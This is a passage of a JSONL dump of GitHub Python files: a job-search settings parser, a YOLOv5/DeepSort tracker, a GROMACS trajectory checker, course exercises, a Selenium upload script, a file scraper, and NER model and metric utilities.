\"r\") as cfg:\n config: Dict = json.load(cfg)\n\n if not no_parse:\n params = self.__parse_args(input_args)\n\n for key, value in params.items():\n if value is not None:\n if key in config:\n config[key] = value\n if \"options\" in config and key in config[\"options\"]:\n config[\"options\"][key] = value\n\n self.update = params.get(\"update\", False)\n if params[\"update\"]:\n with open(config_path, \"w\") as cfg:\n json.dump(config, cfg, indent=2)\n\n # Update attributes:\n for key, value in config.items():\n if hasattr(self, key):\n setattr(self, key, value)\n\n def __repr__(self):\n txt = \"\\n\".join([f\"{k :<16}: {v}\" for k, v in self.__dict__.items()])\n return f\"Settings:\\n{txt}\"\n\n def update_params(self, **kwargs):\n \"\"\"Update object params\"\"\"\n for key, value in kwargs.items():\n if hasattr(self, key) and value is not None:\n setattr(self, key, value)\n\n @staticmethod\n def __parse_args(inputs_args) -> Dict:\n \"\"\"Read arguments from command line.\n\n Returns\n -------\n arguments : dict\n Parsed arguments from command line. Note: some arguments are positional.\n\n \"\"\"\n\n parser = argparse.ArgumentParser(description=\"HeadHunter vacancies researcher\")\n parser.add_argument(\n \"-t\", \"--text\", action=\"store\", type=str, default=None, help='Search query text (e.g. \"Machine learning\")',\n )\n parser.add_argument(\n \"-p\", \"--professional_roles\", action=\"store\", type=int, default=None,\n help='Professional role filter (Possible roles can be found here https://api.hh.ru/professional_roles)',\n nargs='*'\n )\n parser.add_argument(\n \"-n\", \"--num_workers\", action=\"store\", type=int, default=None, help=\"Number of workers for multithreading.\",\n )\n parser.add_argument(\n \"-r\", \"--refresh\", help=\"Refresh cached data from HH API\", action=\"store_true\", default=None,\n )\n parser.add_argument(\n \"-s\", \"--save_result\", help=\"Save parsed result as DataFrame to CSV file.\", action=\"store_true\", default=None,\n )\n parser.add_argument(\n \"-u\", \"--update\", action=\"store_true\", default=None, help=\"Save command line args to file in JSON format.\",\n )\n\n params, unknown = parser.parse_known_args(inputs_args)\n # Update config from command line\n return vars(params)\n\n\nif __name__ == \"__main__\":\n settings = Settings(\n config_path=\"../settings.json\", input_args=(\"--num_workers\", \"5\", \"--refresh\", \"--text\", \"Data Scientist\"),\n )\n\n print(settings)\n","repo_name":"hukenovs/hh_research","sub_path":"src/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":5739,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"18"} +{"seq_id":"157725906","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Created on 2021/6/23 16:55\n Filename : yolov5_tracker.py\n Author : Taosy.W\n Zhihu : https://www.zhihu.com/people/1105936347\n Github : https://github.com/AFei19911012\n Description: 人车检测追踪,参考源码:https://github.com/mikel-brostrom/Yolov5_DeepSort_Pytorch.git\n\"\"\"\n\n# =======================================================\nimport cv2\nimport torch\nimport os\n\nfrom deep_sort.deep_sort import DeepSort\nfrom deep_sort.utils.parser import get_config\nfrom yolov5_detector import YOLOv5Detector\n\nos.environ['KMP_DUPLICATE_LIB_OK'] = 'TRUE'\n\n\ndef draw_image(image, bbox_container, obj_ids):\n \"\"\" 绘制人车标签 \"\"\"\n \"\"\" 线宽 \"\"\"\n tl = 2 or round(0.002 * (image.shape[0] + image.shape[1]) / 2) + 1\n for i, bbox in enumerate(bbox_container):\n label = bbox['class']\n x1, y1, x2, y2 = bbox['box']\n c1, c2 = (x1, y1), (x2, y2)\n if label == 'person':\n color = (255, 0, 0)\n elif label == 'car':\n color = (0, 0, 255)\n else:\n color = (0, 255, 0)\n cv2.rectangle(image, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)\n \"\"\" 字体宽度 \"\"\"\n tf = max(tl - 1, 1)\n label_show = f'{label}-{obj_ids[i]}'\n t_size = cv2.getTextSize(label_show, 0, fontScale=tl/3, thickness=tf)[0]\n c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3\n \"\"\" filled \"\"\"\n cv2.rectangle(image, c1, c2, color, cv2.FILLED, cv2.LINE_AA)\n cv2.putText(image, label_show, (c1[0], c1[1] - 2), 0, tl/3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)\n\n\ndef xyxy_to_xywh(box):\n \"\"\" 目标框转换 \"\"\"\n x1, y1, x2, y2 = box\n w = x2 - x1\n h = y2 - y1\n x_c = int(x1 + w/2)\n y_c = int(y1 + h/2)\n return [x_c, y_c, w, h]\n\n\ndef cut_bbox_container(bbox_container):\n \"\"\" 只保留人车信息 \"\"\"\n container = []\n for bbox in bbox_container:\n label = bbox['class']\n confidence = bbox['confidence']\n box = bbox['box']\n if label in ['person', 'car']:\n container.append({'class': label, 'confidence': confidence, 'box': box})\n return container\n\n\ndef main():\n video_name = 'car.mp4'\n # video_name = 'car.mp4'\n cap = cv2.VideoCapture(f'data/videos/{video_name}')\n fource = cv2.VideoWriter_fourcc(*'mp4v')\n width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n vid_writer = cv2.VideoWriter(f'runs/track/{video_name}.mp4', fource, 30, (width, height))\n \"\"\" yolov5 目标检测器 \"\"\"\n yolov5_detector = YOLOv5Detector()\n \"\"\" deepsort 追踪器 \"\"\"\n cfg = get_config()\n cfg.merge_from_file(\"deep_sort/configs/deep_sort.yaml\")\n deepsort = DeepSort(cfg.DEEPSORT.REID_CKPT,\n max_dist=cfg.DEEPSORT.MAX_DIST,\n min_confidence=cfg.DEEPSORT.MIN_CONFIDENCE,\n nms_max_overlap=cfg.DEEPSORT.NMS_MAX_OVERLAP,\n max_iou_distance=cfg.DEEPSORT.MAX_IOU_DISTANCE,\n max_age=cfg.DEEPSORT.MAX_AGE,\n n_init=cfg.DEEPSORT.N_INIT,\n nn_budget=cfg.DEEPSORT.NN_BUDGET,\n use_cuda=True)\n window_name = 'Real-time tracking'\n while True:\n state, frame = cap.read()\n if not state:\n break\n \"\"\" 检测目标 \"\"\"\n image, bbox_container = yolov5_detector(frame)\n \"\"\" 仅保留人车信息\"\"\"\n bbox_container = cut_bbox_container(bbox_container)\n \"\"\" 初始化一些变量 \"\"\"\n xywh_bboxs = []\n labels = []\n confs = []\n for bbox in bbox_container:\n xywh_bboxs.append(xyxy_to_xywh(bbox['box']))\n labels.append(bbox['class'])\n confs.append(bbox['confidence'])\n \"\"\" 检测到目标后才有追踪 \"\"\"\n if labels:\n \"\"\" detections --> deepsort \"\"\"\n xywhs = torch.Tensor(xywh_bboxs)\n confss = torch.Tensor(confs)\n outputs = deepsort.update(xywhs, confss, labels, frame)\n obj_ids = []\n bbox_draw = []\n if len(outputs) > 0:\n for (x1, y1, x2, y2, label, track_id) in outputs:\n bbox_draw.append({'class': label, 'box': [x1, y1, x2, y2]})\n obj_ids.append(track_id)\n \"\"\" 绘图显示 \"\"\"\n draw_image(frame, bbox_draw, obj_ids)\n \"\"\" 输出一些信息 \"\"\"\n for info in bbox_draw:\n print(info)\n print(obj_ids)\n print('---')\n cv2.imshow(window_name, frame)\n vid_writer.write(frame)\n cv2.waitKey(1)\n \"\"\" 点 x 退出 \"\"\"\n if cv2.getWindowProperty(window_name, cv2.WND_PROP_AUTOSIZE) < 1:\n break\n cap.release()\n vid_writer.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AFei19911012/PythonSamples","sub_path":"yolov5/yolov5_tracker.py","file_name":"yolov5_tracker.py","file_ext":"py","file_size_in_byte":4943,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"} +{"seq_id":"71210623079","text":"import sys\nimport os\nimport os.path\nimport subprocess\nimport re\n\nfrom cpc.lib.gromacs import cmds\n\ndef checkTrajectory(filename):\n \"\"\"Check an existing trajectory and return the trajectory time in ns, \n the delta t, and the number of frames\"\"\"\n cmdnames = cmds.GromacsCommands()\n proc=subprocess.Popen(cmdnames.gmxcheck.split() + [\"-f\", filename],\n stdin=None,\n stderr=subprocess.STDOUT,\n stdout=subprocess.PIPE)\n ret=proc.communicate()\n step=re.compile('^Step\\s*([0-9]*)\\s*([0-9]*)', re.MULTILINE)\n if proc.returncode != 0: \n sys.stderr.write('pwd= %s\\n'%os.getcwd())\n sys.stderr.write('Got: %s\\n'%(unicode(ret[0], errors=\"ignore\")))\n match=step.search(ret[0])\n frames=int(match.group(1))\n dt=float(match.group(2))\n ns=(frames-1)*dt/1000.\n sys.stderr.write(\"Using trajectory %s with %g ns of trajectories\\n\"%\n (filename, ns))\n # return the time in ns\n return (ns, dt, frames)\n\n\n\n","repo_name":"gromacs/copernicus","sub_path":"cpc/lib/msm/check_traj.py","file_name":"check_traj.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"18"} +{"seq_id":"31599944137","text":"filename = input(\"Enter file name: \")\nfileholder = open(filename)\ncount = 0\nemails = {}\nfor line in fileholder:\n nline = line.rstrip()\n if 'From' in nline and not \"From:\" in nline:\n lsplit = nline.split()\n emails[lsplit[1]] = emails.get(lsplit[1], 0) + 1\n else:\n continue\n\nbcount = None\nbemail = None\n\nfor email,occurrences in emails.items():\n if bcount is None or occurrences > bcount:\n bemail = email\n bcount = occurrences\n\nprint(bemail, bcount)\n","repo_name":"VerisimilitudeX/Python-For-Everybody--Python-Data-Structures-Certification","sub_path":"Assignment 9.4.py","file_name":"Assignment 9.4.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"70341721960","text":"import MySQLdb\r\ntry:\r\n db=MySQLdb.connect(\"192.168.3.188\",\"training\",\"training@123\",\"int_b6\")\r\n # print(\"success\")\r\n cursor = db.cursor()\r\n cursor.execute(\"SELECT VERSION()\")\r\n data=cursor.fetchall()\r\n print(data)\r\n db.close()\r\nexcept:\r\n print(\"error\")\r\n","repo_name":"arjun2038/Python-Basic-Programming","sub_path":"DataBase/Connection.py","file_name":"Connection.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21193555488","text":"import numpy as np\n\n\ndef subtract_smooth(x, y):\n resized_y = y.copy()\n resized_y.resize(x.shape)\n y_new = resized_y - median_filter(x, resized_y, 1.)\n return y_new\n\n\ndef median_filter(x, y, width):\n # Error: IndexError: boolean index did not match indexed array along dimension 0; dimension is 4 but\n # corresponding boolean dimension is 5\n # I searched in google about 'boolean index did not match indexed array along dimension'\n # I noticed that y_new has the same shape as y, but in this case x has another shape\n # The calculation inside the y brackets returns an array of booleans that has a different shape than y\n # Maybe we can fill with zeros the smallest array in order to keep all the data points but I'm not sure\n y_new = np.zeros(y.shape)\n for i in range(len(x)):\n y_new[i] = np.median(y[np.abs(x - x[i]) < width * 0.5])\n return y_new\n\n\nprint(subtract_smooth(np.array([1, 2, 3, 4, 5]), np.array([4, 5, 6, 8])))\n","repo_name":"kevinszuchet/itc-fellows-part-time","sub_path":"pre_course/ex10_subtract_smooth.py","file_name":"ex10_subtract_smooth.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70569468840","text":"# coding Statement: Write a program to find Sum of digits of a number\r\n\r\n# Description\r\n\r\n# Get a number from user and then find the sum of the digits in the given number.\r\n\r\n# E.g. let the number = 341\r\n\r\n# Sum of digits is 3+4+1= 8\r\n\r\n# Input :4521\r\n\r\n# Output :12\r\n\r\nn=int(input(\"Enter your number : \"))\r\nnum=str(n)\r\nsum=0\r\nfor i in num:\r\n sum=sum+int(i)\r\nprint(\"sum :\",sum)","repo_name":"Raviteja0524/Python_50","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22171671602","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport itertools\nfrom sklearn.metrics import confusion_matrix, f1_score\nimport torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nimport torch.optim as optim\nfrom utils.skseq.sequences.sequence import Sequence\n\n\ndef evaluate_corpus(sequences, sequences_predictions):\n \"\"\"Evaluate classification accuracy at corpus level, comparing with\n gold standard.\"\"\"\n total = 0.0\n correct = 0.0\n for i, sequence in enumerate(sequences):\n pred = sequences_predictions[i]\n for j, y_hat in enumerate(pred.y):\n if sequence.y[j] != 0: #0 is the index of the \"O\" tag\n if sequence.y[j] == y_hat:\n correct += 1\n total += 1\n return correct / total\n\n\ndef show_confusion_matrix(sequences, preds, sp=None, hmm=False, normalize=False, positions=None, labels=None):\n if hmm:\n y_true = [item for sublist in sequences for item in sublist]\n y_pred = [item for sublist in preds for item in sublist]\n else:\n y_true = []\n y_pred = []\n for seq, pred in zip(sequences, preds):\n y_true.extend(seq.y)\n y_pred.extend(pred.y.tolist())\n\n cm = confusion_matrix(y_true, y_pred)\n\n threshold = 24953\n cm_clipped = np.clip(cm, a_min=0, a_max=threshold)\n\n plt.figure(figsize=(10, 10))\n plt.imshow(cm_clipped, interpolation='nearest', cmap=plt.get_cmap('Blues'))\n plt.title(\"Confusion matrix\")\n #plt.colorbar()\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n thresh = threshold / 1.5 if normalize else threshold / 2\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n if normalize:\n plt.text(j, i, \"{:0.4f}\".format(cm[i, j]),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n else:\n plt.text(j, i, \"{:,}\".format(cm[i, j]),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n if (positions==None) | (labels==None):\n positions = list(sp.state_labels.values())\n labels = list(sp.state_labels.keys())\n\n plt.xticks(positions, labels)\n plt.yticks(positions, labels)\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.show()\n\n\ndef get_f1_score(sequences, preds, hmm=False):\n if hmm:\n y_true = [item for sublist in sequences for item in sublist]\n y_pred = [item for sublist in preds for item in sublist]\n else:\n y_true = []\n y_pred = []\n for seq, pred in zip(sequences, preds):\n y_true.extend(seq.y)\n y_pred.extend(pred.y.tolist())\n\n return f1_score(y_true, y_pred, average='weighted')\n\n\ndef tiny_test(model, train_seq=None, hmm=False, state_to_pos=None, decode=\"viterbi\"):\n\n sentences = [\n \"The programmers from Barcelona might write a sentence without a spell checker.\",\n \"The programmers from Barchelona cannot write a sentence without a spell checker.\",\n \"Jack London went to Parris.\",\n \"Jack London went to Paris.\",\n \"Bill gates and Steve jobs never though Microsoft would become such a big company.\",\n \"Bill Gates and Steve Jobs never though Microsof would become such a big company.\",\n \"The president of U.S.A though they could win the war.\",\n \"The president of the United States of America though they could win the war.\",\n \"The king of Saudi Arabia wanted total control.\",\n \"Robin does not want to go to Saudi Arabia.\",\n \"Apple is a great company.\",\n \"I really love apples and oranges.\",\n \"Alice and Henry went to the Microsoft store to buy a new computer during their trip to New York.\"\n ]\n \n y_pred = []\n if hmm:\n for p in sentences:\n pred = model.predict_labels(p.split())\n seq = Sequence(x=p.split(), y=pred)\n print(seq, '\\n') \n y_pred.extend(pred)\n y_pred = [state_to_pos[w] for w in y_pred]\n else:\n preds = []\n for p in sentences:\n seq = Sequence(x=p.split(), y=[int(0) for w in p.split()])\n if decode==\"viterbi\":\n pred = model.viterbi_decode(seq)[0]\n else: #to check if posterior decode works better\n pred = model.posterior_decode(seq)\n preds.append(pred)\n y_pred.extend(pred.y.tolist())\n print(pred.to_words(train_seq, only_tag_translation=True), '\\n')\n\n # evaluate results\n y_true = [0,0,0,1,0,0,0,0,0,0,0,0] + [0,0,0,0,0,0,0,0,0,0,0,0]\n y_true += [6,7,0,0,0] + [6,7,0,0,1]\n y_true += [6,7,0,6,7,0,0,4,0,0,0,0,0,0] + [6,7,0,6,7,0,0,0,0,0,0,0,0,0]\n y_true += [0,0,0,1,0,0,0,0,0,0] + [0,0,0,0,1,5,5,5,0,0,0,0,0,0]\n y_true += [0,0,0,1,5,0,0,0] + [6,0,0,0,0,0,0,1,5]\n y_true += [4,0,0,0,0] + [0,0,0,0,0,0]\n y_true += [6,0,6,0,0,0,4,0,0,0,0,0,0,0,0,0,0,1,5]\n\n correct = total = 0\n for y, y_hat in zip(y_true, y_pred):\n if y != 0: #0 is the index of the \"O\" tag\n if y == y_hat:\n correct += 1\n total += 1\n print(\"\\n===============================\")\n print(f\"Accuracy in TINY TEST = {round(correct/total, 4)}\")\n print(\"===============================\")\n\n\n\nclass BiLSTM_CRF_v2(nn.Module):\n\n def __init__(self, vocab_size, tag_to_ix, embedding_dim, hidden_dim):\n super(BiLSTM_CRF_v2, self).__init__()\n self.embedding_dim = embedding_dim\n self.hidden_dim = hidden_dim\n self.vocab_size = vocab_size\n self.tag_to_ix = tag_to_ix\n self.tagset_size = len(tag_to_ix)\n\n self.word_embeds = nn.Embedding(vocab_size, embedding_dim)\n self.lstm = nn.LSTM(embedding_dim, hidden_dim // 2,\n num_layers=1, bidirectional=True)\n\n # Maps the output of the LSTM into tag space.\n self.hidden2tag = nn.Linear(hidden_dim, self.tagset_size)\n\n # Matrix of transition parameters. Entry i,j is the score of\n # transitioning *to* i *from* j.\n self.transitions = nn.Parameter(\n torch.randn(self.tagset_size, self.tagset_size))\n\n # These two statements enforce the constraint that we never transfer\n # to the start tag and we never transfer from the stop tag\n self.transitions.data[tag_to_ix[START_TAG], :] = -10000\n self.transitions.data[:, tag_to_ix[STOP_TAG]] = -10000\n\n\n self.hidden = self.init_hidden()\n\n def init_hidden(self):\n return (torch.randn(2, 1, self.hidden_dim // 2),\n torch.randn(2, 1, self.hidden_dim // 2))\n\n def _forward_alg(self, feats):\n # Do the forward algorithm to compute the partition function\n init_alphas = torch.full((1, self.tagset_size), -10000.)\n # START_TAG has all of the score.\n init_alphas[0][self.tag_to_ix[START_TAG]] = 0.\n\n # Wrap in a variable so that we will get automatic backprop\n forward_var = init_alphas\n forward_var = forward_var\n\n # Iterate through the sentence\n for feat in feats:\n alphas_t = [] # The forward tensors at this timestep\n for next_tag in range(self.tagset_size):\n # broadcast the emission score: it is the same regardless of\n # the previous tag\n emit_score = feat[next_tag].view(\n 1, -1).expand(1, self.tagset_size)\n # the ith entry of trans_score is the score of transitioning to\n # next_tag from i\n trans_score = self.transitions[next_tag].view(1, -1)\n # The ith entry of next_tag_var is the value for the\n # edge (i -> next_tag) before we do log-sum-exp\n next_tag_var = forward_var + trans_score + emit_score\n # The forward variable for this tag is log-sum-exp of all the\n # scores.\n alphas_t.append(log_sum_exp(next_tag_var).view(1))\n forward_var = torch.cat(alphas_t).view(1, -1)\n terminal_var = forward_var + self.transitions[self.tag_to_ix[STOP_TAG]]\n alpha = log_sum_exp(terminal_var)\n return alpha\n\n def _get_lstm_features(self, sentence):\n self.hidden = self.init_hidden()\n embeds = self.word_embeds(sentence).view(len(sentence), 1, -1)\n lstm_out, self.hidden = self.lstm(embeds, self.hidden)\n lstm_out = lstm_out.view(len(sentence), self.hidden_dim)\n lstm_feats = self.hidden2tag(lstm_out)\n return lstm_feats\n\n def _score_sentence(self, feats, tags):\n # Gives the score of a provided tag sequence\n score = torch.zeros(1)\n tags = torch.cat([torch.tensor([self.tag_to_ix[START_TAG]], dtype=torch.long), tags])\n for i, feat in enumerate(feats):\n score = score + \\\n self.transitions[tags[i + 1], tags[i]] + feat[tags[i + 1]]\n score = score + self.transitions[self.tag_to_ix[STOP_TAG], tags[-1]]\n return score\n\n def _viterbi_decode(self, feats):\n backpointers = []\n\n # Initialize the viterbi variables in log space\n init_vvars = torch.full((1, self.tagset_size), -10000.)\n init_vvars[0][self.tag_to_ix[START_TAG]] = 0\n\n # forward_var at step i holds the viterbi variables for step i-1\n forward_var = init_vvars\n for feat in feats:\n bptrs_t = [] # holds the backpointers for this step\n viterbivars_t = [] # holds the viterbi variables for this step\n\n for next_tag in range(self.tagset_size):\n # next_tag_var[i] holds the viterbi variable for tag i at the\n # previous step, plus the score of transitioning\n # from tag i to next_tag.\n # We don't include the emission scores here because the max\n # does not depend on them (we add them in below)\n next_tag_var = forward_var + self.transitions[next_tag]\n best_tag_id = argmax(next_tag_var)\n bptrs_t.append(best_tag_id)\n viterbivars_t.append(next_tag_var[0][best_tag_id].view(1))\n # Now add in the emission scores, and assign forward_var to the set\n # of viterbi variables we just computed\n forward_var = (torch.cat(viterbivars_t) + feat).view(1, -1)\n backpointers.append(bptrs_t)\n\n # Transition to STOP_TAG\n terminal_var = forward_var + self.transitions[self.tag_to_ix[STOP_TAG]]\n best_tag_id = argmax(terminal_var)\n path_score = terminal_var[0][best_tag_id]\n\n # Follow the back pointers to decode the best path.\n best_path = [best_tag_id]\n for bptrs_t in reversed(backpointers):\n best_tag_id = bptrs_t[best_tag_id]\n best_path.append(best_tag_id)\n # Pop off the start tag (we dont want to return that to the caller)\n start = best_path.pop()\n assert start == self.tag_to_ix[START_TAG] # Sanity check\n best_path.reverse()\n return path_score, best_path\n\n def neg_log_likelihood(self, sentence, tags):\n feats = self._get_lstm_features(sentence)\n forward_score = self._forward_alg(feats)\n gold_score = self._score_sentence(feats, tags)\n return forward_score - gold_score\n\n def forward(self, sentence): # dont confuse this with _forward_alg above.\n # Get the emission scores from the BiLSTM\n lstm_feats = self._get_lstm_features(sentence)\n\n # Find the best path, given the features.\n score, tag_seq = self._viterbi_decode(lstm_feats)\n return score, tag_seq\n\n\ndef argmax(vec):\n # return the argmax as a python int\n _, idx = torch.max(vec, 1)\n return idx.item()\n\n\ndef prepare_sequence(seq, to_ix):\n idxs = [to_ix[w] for w in seq]\n return torch.tensor(idxs, dtype=torch.long)\n\n\n# Compute log sum exp in a numerically stable way for the forward algorithm\ndef log_sum_exp(vec):\n max_score = vec[0, argmax(vec)]\n max_score_broadcast = max_score.view(1, -1).expand(1, vec.size()[1])\n return max_score + \\\n torch.log(torch.sum(torch.exp(vec - max_score_broadcast)))\n","repo_name":"pabloac31/NLP-NER","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"72111216361","text":"import csv\nimport requests\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport os\nimport urllib.parse\nimport config\n\nrequest = urllib.request.Request(config.SCRAPE_LINK)\nresponse = urllib.request.urlopen(request)\nsoup = BeautifulSoup(response, \"html.parser\")\ndownloads_dir = os.path.dirname(os.path.abspath(__file__)) + '\\downloads'\n\nfor a in soup.findAll('a'):\n\tfilename = a['href'] \n\tfile_path = os.path.join(downloads_dir, filename)\n\t\n\tif not os.path.isfile(file_path):\n\t\turl = config.BASE_FILE + filename\n\t\tpath = urllib.parse.urlparse(url).path\n\t\text = os.path.splitext(path)[1]\n\t\tif ext in config.FILE_TYPES:\n\t\t\tfile = urllib.request.urlopen(url)\n\t\t\toutput = open(os.path.join(file_path),'wb')\n\t\t\toutput.write(file.read())\n\t\t\toutput.close()\n\t\t\tprint('Downloaded and Placed in /downloads: ' + filename)\n\telse:\n\t\tprint (filename + \" already located in downloads directory.\")\n","repo_name":"ishakm/scraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"18614733102","text":"import time\nimport math\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport pyperclip\nimport os\ncurrent_dir = os.path.abspath(os.path.dirname(__file__))\nfile_path = os.path.join(current_dir, '1.txt')\n\n\ndef calc(x):\n return str(math.log(abs(12*math.sin(int(x)))))\n\n\nlink = \"http://suninjuly.github.io/file_input.html\"\n\nwith webdriver.Chrome() as browser:\n browser.get(link)\n browser.find_element(By.CSS_SELECTOR, \"[placeholder='Enter first name']\").send_keys(\"Ivan\")\n browser.find_element(By.CSS_SELECTOR, \"[placeholder='Enter last name']\").send_keys(\"Petrov\")\n browser.find_element(By.CSS_SELECTOR, \"[placeholder='Enter email']\").send_keys(\"Petrov@mail.ru\")\n\n browser.find_element(By.CSS_SELECTOR, \"[id='file']\").send_keys(file_path)\n browser.find_element(By.CLASS_NAME, \"btn-primary\").click()\n\n alert = browser.switch_to.alert\n addToClipBoard = alert.text.split(': ')[-1]\n pyperclip.copy(addToClipBoard)\n","repo_name":"Arzamasov-Zakhar/-stepik_auto_tests_course","sub_path":"2.2.8.py","file_name":"2.2.8.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36063730135","text":"# -*- codeing = utf-8 -*-\n# @Time : 2023-8-30 23:07\n# @Author : 刘永奇\n# @File : 84. 柱状图中最大的矩形.py\n# @Software : PyCharm\nclass Solution:\n def largestRectangleArea(self, heights: List[int]) -> int:\n s = []\n l = [-1] * len(heights)\n r = [len(heights)] * len(heights)\n\n for i in range(len(heights)):\n while len(s) != 0 and heights[i] <= heights[s[-1]]:\n r[s[-1]] = i\n s.pop()\n if len(s) != 0:\n l[i] = s[-1]\n s.append(i)\n res = 0\n for i in range(len(heights)):\n res = max(res, (heights[i] * (r[i] - l[i] - 1)))\n return res\n","repo_name":"xs-web-lyq/LeetCode","sub_path":"Python/84. 柱状图中最大的矩形.py","file_name":"84. 柱状图中最大的矩形.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70674562919","text":"from sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import auc\nimport math\nimport numpy as np\n\n\ndef get_confusion_matrix(y_true, y_pred) -> tuple:\n \"\"\"\n Returns tp, tn, fp, fn\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: (tp, tn, fp, fn)\n \"\"\"\n tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()\n return tp, tn, fp, fn\n\n\ndef get_accuracy(y_true, y_pred) -> float:\n \"\"\"\n Returns the accuracy score\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: Accuracy score\n \"\"\"\n # We need to cast to np.array so that .shape exists\n if isinstance(y_true, list):\n y_true = np.array(y_true)\n if isinstance(y_pred, list):\n y_pred = np.array(y_pred)\n\n if len(y_true.shape) > 1:\n y_true = y_true.argmax(axis=1)\n if len(y_pred.shape) > 1:\n y_pred = y_pred.argmax(axis=1)\n\n return accuracy_score(y_true, y_pred)\n\n\ndef get_f1_score(y_true, y_pred) -> float:\n \"\"\"\n Returns the F-1 score\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: F-1 score\n \"\"\"\n if len(np.unique(y_true)) > 2:\n average = None\n else:\n average = 'binary'\n return f1_score(y_true, y_pred, average=average)\n\n\ndef get_recall(y_true, y_pred) -> float:\n \"\"\"\n Returns the recall score\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: Recall score\n \"\"\"\n if len(np.unique(y_true)) > 2:\n average = None\n else:\n average = 'binary'\n return recall_score(y_true, y_pred, average=average)\n\n\ndef get_precision(y_true, y_pred) -> float:\n \"\"\"\n Returns the precision.\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: Precision\n \"\"\"\n if len(np.unique(y_true)) > 2:\n average = None\n else:\n average = 'binary'\n return precision_score(y_true, y_pred, average=average)\n\n\ndef get_pf(y_true, y_pred) -> float:\n \"\"\"\n Returns the false alarm rate\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: False alarm rate\n \"\"\"\n _, tn, fp, fn = get_confusion_matrix(y_true, y_pred)\n return 1. * fp / (fp + tn) if fp + tn != 0 else 0\n\n\ndef get_pd_pf(y_true, y_pred) -> float:\n \"\"\"\n Returns the value of recall - false alarm rate.\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: Recall - false alarm rate\n \"\"\"\n return get_recall(y_true, y_pred) - get_pf(y_true, y_pred)\n\n\ndef get_roc_auc(y_true, y_pred) -> float:\n \"\"\"\n Returns the area under the pd/pf curve\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: AUC score\n \"\"\"\n return roc_auc_score(y_true, y_pred)\n\n\ndef get_d2h(y_true, y_pred) -> float:\n \"\"\"\n Returns the distance to heaven metric\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: d2h score\n \"\"\"\n return 1. / math.sqrt(2) - math.sqrt(get_pf(y_true, y_pred) ** 2 + (1. - get_recall(y_true, y_pred)) ** 2) / math.sqrt(2)\n\n\ndef get_d2h2(y_true, y_pred) -> float:\n \"\"\"\n Returns the distance to heaven metric\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: d2h score\n \"\"\"\n return 1. / math.sqrt(2) - math.sqrt(2.*get_pf(y_true, y_pred) ** 2 + (1. - get_recall(y_true, y_pred)) ** 2) / math.sqrt(2)\n\n\ndef get_ifa(y_true, y_pred) -> float:\n ifa = 0\n actual_results = np.asarray(y_true)\n predicted_results = np.asarray(y_pred)\n index = 0\n for i, j in zip(actual_results, predicted_results):\n if ((i == \"yes\") and (j == \"yes\")) or ((i == 1) and (j == 0)):\n break\n elif ((i == \"no\") and (j == \"yes\")) or ((i == 0) and (j == 1)):\n ifa += 1\n index += 1\n return ifa\n\n\ndef get_g1_score(y_true, y_pred) -> float:\n \"\"\"\n Returns the G-1 score\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: G-1 score\n \"\"\"\n tp, tn, fp, fn = get_confusion_matrix(y_true, y_pred)\n pf = 1. * fp / (fp + tn) if fp 